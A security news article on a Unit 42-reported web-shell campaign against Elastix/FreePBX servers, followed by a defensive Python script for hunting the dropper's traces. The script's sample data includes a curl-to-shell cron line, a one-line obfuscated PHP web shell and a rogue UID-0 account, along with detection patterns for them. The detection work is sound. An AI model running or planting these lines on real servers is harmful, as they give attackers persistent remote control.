- The attacks are believed to exploit a remote code execution (RCE) vulnerability rated CVSS 9.8.
- The attacker’s IPv4 address reveals an association with adult-themed Russian websites.
- There are two groups using different versions of the attack script.
Security researchers at Palo Alto Networks' Unit 42 announced that hackers have launched a new campaign targeting Elastix VoIP telephony servers, a unified-communications server suite used in Digium phones. The team stated that they observed more than 500,000 unique malware samples between December 2021 and March 2022. The attackers implant a web shell, which the researchers believe is delivered through the remote code execution vulnerability CVE-2021-45461 (an RCE in the FreePBX Rest Phone Apps module, CVSS score 9.8).
Two attack scripts
The Unit 42 team categorized its original sample set into two main groups, Group 1 and Group 2, and further subdivided Group 2 into two subgroups, Group A and Group B. Group 1 and Group 2 use different versions of the attack script, while subgroups A and B correspond to two different clusters of targets.
The initial dropper is a shell script with two main objectives: install the obfuscated PHP backdoor in multiple locations on the file system, and maintain access by creating several root user accounts or setting up a scheduled task that re-infects the host. The dropper also tries to blend into the existing environment by spoofing the timestamp of the installed PHP backdoor file to match that of a known file already on the system.
It also fetches and executes remote scripts from the attackers' infrastructure. The attacker's IPv4 address is located in the Netherlands, but its past DNS records reveal an association with mostly adult-themed Russian domains. Unit 42 said,
« The strategy of implanting web shells in vulnerable servers is not a new tactic for malicious actors. The only way to catch advanced intrusions is a defense-in-depth strategy. Only by orchestrating multiple security appliances and applications in a single pane can defenders detect these attacks. Aside from the numerous protections offered across the Palo Alto Networks product suite, WildFire, Advanced URL Filtering and Threat Prevention provide coverage for this family of samples. »
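The dropper behaviour described above (extra UID-0 accounts, a re-infection cron job, time-stomped backdoor files and obfuscated PHP) leaves host-side traces that can be hunted for without any vendor appliance. The script below is an added example written for this page, not Unit 42's tooling or the campaign's own code; every input (the passwd excerpt, crontab lines, stat() values and PHP bodies) is constructed inline so it runs offline, the `sysadm` user and `.cache/a.php` path are hypothetical, and 203.0.113.5 is a documentation address. On a live Elastix/FreePBX host you would feed it the real `/etc/passwd`, the cron directories and `os.stat()` results from the web root.

```python
"""Host-hunting heuristics for the dropper behaviour described above:
extra UID-0 accounts, re-infection cron entries, time-stomped web-root
files and obfuscated PHP. Added example, not Unit 42's tooling; every
input below is constructed so the script runs offline."""
import re
from dataclasses import dataclass

# --- 1. root-equivalent accounts the dropper adds ----------------------------
# Constructed /etc/passwd excerpt; 'sysadm' stands in for an attacker-added user.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
asterisk:x:498:498::/var/lib/asterisk:/sbin/nologin
sysadm:x:0:0::/home/sysadm:/bin/bash
apache:x:48:48:Apache:/var/www:/sbin/nologin
"""

def extra_root_accounts(passwd_text):
    """Usernames other than 'root' whose UID field is 0."""
    hits = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) >= 3 and fields[2] == "0" and fields[0] != "root":
            hits.append(fields[0])
    return hits

# --- 2. scheduled tasks that re-fetch or re-run the implant ------------------
# Constructed crontab lines; 203.0.113.5 is a documentation (TEST-NET-3) address.
SAMPLE_CRON = [
    "0 3 * * * /usr/bin/find /var/log -name '*.gz' -mtime +30 -delete",
    "*/5 * * * * curl -s http://203.0.113.5/x.sh | sh",
    "@reboot /usr/bin/php /var/www/html/.cache/a.php",
]
FETCH_AND_RUN = re.compile(r"\b(curl|wget)\b.*\|\s*(sh|bash)\b")   # download piped to a shell
HIDDEN_PHP = re.compile(r"\bphp\s+\S*/\.\S*\.php")                  # php run from a dot-directory

def suspicious_cron(lines):
    """Crontab lines that pull a remote script into a shell or run PHP from a hidden dir."""
    return [l for l in lines if FETCH_AND_RUN.search(l) or HIDDEN_PHP.search(l)]

# --- 3. time-stomped files ---------------------------------------------------
@dataclass
class FileMeta:
    path: str
    mtime: float   # settable from user space (utime / touch -r)
    ctime: float   # inode change time; the kernel bumps it on create/chmod/utime

NOW = 1_650_000_000          # fixed "current time" so the example is deterministic
DAY = 86_400
SAMPLE_FILES = [             # constructed stat() results
    FileMeta("/var/www/html/index.php", NOW - 400 * DAY, NOW - 400 * DAY),     # old, untouched
    FileMeta("/var/www/html/admin/config.php", NOW - 600, NOW - 600),          # recent legit edit
    FileMeta("/var/www/html/.cache/a.php", NOW - 400 * DAY, NOW - 3_600),      # mtime copied from index.php
]

def timestomped(files, now=NOW, recent=DAY, window=7 * DAY):
    """A file whose inode changed within `recent` seconds but whose mtime sits
    more than `window` earlier is a time-stomping candidate: touch -r copies
    mtime/atime from the reference file but cannot stop the kernel updating ctime."""
    return [f.path for f in files
            if now - f.ctime < recent and f.ctime - f.mtime > window]

# --- 4. obfuscated PHP backdoor bodies ---------------------------------------
OBFUSCATION = re.compile(r"\b(eval|base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I)
SAMPLE_PHP = {   # constructed file contents
    "/var/www/html/index.php": "<?php require 'config.php'; echo render($page); ?>",
    "/var/www/html/.cache/a.php": "<?php eval(gzinflate(base64_decode($_POST['x']))); ?>",
}

def obfuscated_php(files, min_hits=2):
    """Flag files that stack two or more decode/exec primitives in one body."""
    return [p for p, src in files.items() if len(OBFUSCATION.findall(src)) >= min_hits]

def hunt():
    """Run all four checks over the constructed inputs; returns only non-empty findings."""
    findings = {
        "extra_root_accounts": extra_root_accounts(SAMPLE_PASSWD),
        "suspicious_cron": suspicious_cron(SAMPLE_CRON),
        "timestomped": timestomped(SAMPLE_FILES),
        "obfuscated_php": obfuscated_php(SAMPLE_PHP),
    }
    return {k: v for k, v in findings.items() if v}

if __name__ == "__main__":
    for check, hits in hunt().items():
        print(f"[{check}]")
        for h in hits:
            print("   ", h)
```

The time-stomping check is a triage signal rather than proof: a legitimate `chmod` on an old file also produces a fresh ctime with an old mtime, so confirm hits by comparing the flagged file's mtime against the reference file it was copied from and by reviewing the file body with the obfuscation check. Because the implant is written to several locations and re-created by the cron entry, removing a single flagged file without also removing the UID-0 accounts and the scheduled task will not clean the host.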